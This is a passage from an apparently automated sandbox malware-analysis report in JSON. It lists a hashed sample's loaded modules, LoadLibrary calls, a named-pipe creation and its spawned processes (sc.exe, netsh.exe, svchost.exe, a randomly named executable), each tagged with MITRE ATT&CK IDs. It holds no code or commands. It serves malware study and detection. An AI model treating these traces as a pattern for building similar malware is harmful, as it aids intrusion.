\"%WINDIR%\\System32\\bcryptprimitives.dll\" at 74A90000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-138", "type": 6, "relevance": 3, "name": "Calls an API typically used to create an instance of a named pipe", "description": "\"svchost.exe\" called \"NtCreateNamedPipeFile\" with parameter \"pipe\\uqyipjlp\" - (UID: 00000000-00002980)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"GDI32.DLL\" at base 776b0000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 75750000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71a40000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"KERNEL32\" at base 75770000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a0e0000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"KERNEL32.DLL\" at base 75770000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"WS2_32.DLL\" at base 75af0000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"DBGHELP.DLL\" at base 6e990000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"USER32.DLL\" at base 75bc0000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"ADVAPI32.DLL\" at base 75850000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"SHELL32.DLL\" at base 761a0000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"OLEAUT32.DLL\" at base 76e00000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"MSVCR100.DLL\" at base 6a020000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"NTDLL.DLL\" at base 774b0000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"OLE32.DLL\" at base 75de0000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"CRYPTBASE.DLL\" at base 752b0000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73f30000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"PROPSYS.DLL\" at base 740a0000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"COMCTL32.DLL\" at base 74280000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"APPHELP.DLL\" at base 75260000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"CLBCATQ.DLL\" at base 75b30000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6a9c0000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75770000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"SETUPAPI.DLL\" at base 75900000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"RPCRT4.DLL\" at base 76ea0000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 740a0000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"NTMARTA.DLL\" at base 74820000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75f40000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"PROFAPI.DLL\" at base 753c0000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 754c0000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 77360000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"SECUR32.DLL\" at base 750f0000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75440000\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75260000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71a40000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 75770000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"sc.exe\" loaded module \"GDI32.DLL\" at base 776b0000\n \"sc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 75750000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71a40000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"sc.exe\" loaded module \"KERNEL32\" at base 75770000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"nhhyjsjl.exe\" loaded module \"KERNEL32.DLL\" at base 75770000\n \"nhhyjsjl.exe\" loaded module \"WS2_32.DLL\" at base 75af0000\n \"nhhyjsjl.exe\" loaded module \"DBGHELP.DLL\" at base 6e990000\n \"nhhyjsjl.exe\" loaded module \"USER32.DLL\" at base 75bc0000\n \"nhhyjsjl.exe\" loaded module \"ADVAPI32.DLL\" at base 75850000\n \"nhhyjsjl.exe\" loaded module \"SHELL32.DLL\" at base 761a0000\n \"nhhyjsjl.exe\" loaded module \"OLEAUT32.DLL\" at base 76e00000\n \"nhhyjsjl.exe\" loaded module \"MSVCR100.DLL\" at base 699e0000\n \"nhhyjsjl.exe\" loaded module \"SSPICLI.DLL\" at base 75240000\n \"nhhyjsjl.exe\" loaded module \"RPCRT4.DLL\" at base 76ea0000\n \"nhhyjsjl.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75f40000\n \"nhhyjsjl.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75260000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71a40000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"netsh.exe\" loaded module \"KERNEL32\" at base 75770000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"netsh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a0e0000\n \"netsh.exe\" loaded module \"DHCPCMONITOR.DLL\" at base 6d340000\n \"netsh.exe\" loaded module \"WSHELPER.DLL\" at base 6c3b0000\n \"netsh.exe\" loaded module \"KERNEL32.DLL\" at base 75770000\n \"netsh.exe\" loaded module \"NSHHTTP.DLL\" at base 6be90000\n \"netsh.exe\" loaded module \"FWCFG.DLL\" at base 6b840000\n \"netsh.exe\" loaded module \"AUTHFWCFG.DLL\" at base 69980000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75770000\n \"netsh.exe\" loaded module \"IFMON.DLL\" at base 6be80000\n \"netsh.exe\" loaded module \"NETIOHLP.DLL\" at base 69950000\n \"netsh.exe\" loaded module \"WHHELPER.DLL\" at base 6bc60000\n \"netsh.exe\" loaded module \"HNETMON.DLL\" at base 6bae0000\n \"netsh.exe\" loaded module \"RPCNSH.DLL\" at base 6b960000\n \"netsh.exe\" loaded module \"DOT3CFG.DLL\" at base 69fc0000\n \"netsh.exe\" loaded module \"NAPMONTR.DLL\" at base 69920000\n \"netsh.exe\" loaded module \"NSHIPSEC.DLL\" at base 685f0000\n \"netsh.exe\" loaded module \"RPCRT4.DLL\" at base 76ea0000\n \"netsh.exe\" loaded module \"NETTRACE.DLL\" at base 683b0000\n \"netsh.exe\" loaded module \"WCNNETSH.DLL\" at base 6b920000\n \"netsh.exe\" loaded module \"P2PNETSH.DLL\" at base 68380000\n \"netsh.exe\" loaded module \"WLANCFG.DLL\" at base 681d0000\n \"netsh.exe\" loaded module \"WWANCFG.DLL\" at base 6b7e0000\n \"netsh.exe\" loaded module \"PEERDISTSH.DLL\" at base 65230000\n \"netsh.exe\" loaded module \"OLE32.DLL\" at base 75de0000\n \"netsh.exe\" loaded module \"CRYPTBASE.DLL\" at base 752b0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73f30000\n \"netsh.exe\" loaded module \"CRYPTSP.DLL\" at base 74dc0000\n \"netsh.exe\" loaded module \"USER32.DLL\" at base 75bc0000\n \"netsh.exe\" loaded module \"CLBCATQ.DLL\" at base 75b30000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\QAGENT.DLL\" at base 6bde0000\n \"netsh.exe\" loaded module \"ADVAPI32.DLL\" at base 75850000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 75f40000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 75f40000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 75f40000\n \"netsh.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75f40000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74b50000\n \"netsh.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75350000\n \"netsh.exe\" loaded module \"HTTPAPI.DLL\" at base 6d0b0000\n \"netsh.exe\" loaded module \"USERENV.DLL\" at base 75420000\n \"netsh.exe\" loaded module \"GPAPI.DLL\" at base 74990000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 74a90000\n \"netsh.exe\" loaded module \"OLEAUT32.DLL\" at base 76e00000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71a40000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"svchost.exe\" loaded module \"KERNEL32\" at base 75770000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"svchost.exe\" loaded module \"IPHLPAPI.DLL\" at base 720a0000\n \"svchost.exe\" loaded module \"DHCPCSVC6.DLL\" at base 713c0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 73a40000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 73670000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75f40000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 73730000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74d80000\n \"svchost.exe\" loaded module \"DNSAPI.DLL\" at base 74c40000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 73660000\n \"svchost.exe\" loaded module \"WS2_32.DLL\" at base 75af0000\n \"svchost.exe\" loaded module \"RPCRT4.DLL\" at base 76ea0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 713e0000\n \"svchost.exe\" loaded module \"RASADHLP.DLL\" at base 6cb50000\n \"svchost.exe\" loaded module \"SSPICLI.DLL\" at base 75240000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75f40000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 748e0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00004512)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004672)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004672)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004672)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004672)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00001376)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00001376)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001376)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001376)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001376)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001376)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00004608)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00004608)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004608)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004608)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004608)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004608)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00004836)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00004836)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004836)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004836)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004836)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004836)\n \"nhhyjsjl.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002928)\n \"nhhyjsjl.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00002928)\n \"nhhyjsjl.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00002928)\n \"nhhyjsjl.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00002928)\n \"nhhyjsjl.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00002928)\n \"nhhyjsjl.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002928)\n \"nhhyjsjl.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002928)\n \"nhhyjsjl.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00002928)\n \"nhhyjsjl.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00002928)\n \"nhhyjsjl.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00002928)\n \"nhhyjsjl.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00002928)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DHCPCMONITOR.DLL (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpcsvc.dll (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpqec.dll (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WSHELPER.DLL (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHHTTP.DLL (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter FWCFG.DLL (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter AUTHFWCFG.DLL (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter IFMON.DLL (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETIOHLP.DLL (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WHHELPER.DLL (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HNETMON.DLL (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter RPCNSH.DLL (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DOT3CFG.DLL (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NAPMONTR.DLL (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHIPSEC.DLL (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETTRACE.DLL (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WCNNETSH.DLL (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter P2PNETSH.DLL (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WLANCFG.DLL (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WWANCFG.DLL (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter PEERDISTSH.DLL (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HTTPAPI.dll (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter userenv.dll (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002444)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00002444)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002980)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002980)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002980)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002980)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter Iphlpapi.dll (UID: 00000000-00002980)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00002980)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00002980)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00002980)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00002980)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"nhhyjsjl.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", 